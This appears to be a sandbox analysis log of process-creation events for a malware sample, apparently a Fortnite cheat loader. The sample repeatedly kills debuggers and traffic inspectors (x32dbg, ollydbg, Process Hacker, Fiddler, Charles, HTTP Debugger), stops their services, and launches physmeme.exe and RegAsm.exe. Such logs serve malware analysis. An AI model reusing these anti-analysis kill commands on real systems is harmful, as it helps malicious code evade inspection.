Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq x32dbg" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq ollydbg" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerPro	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq ollydbg" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerPro	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerPro	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\Speech\physmeme.exe "C:\Windows\Speech\physmeme.exe"	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq charles" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2084 -s 380	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
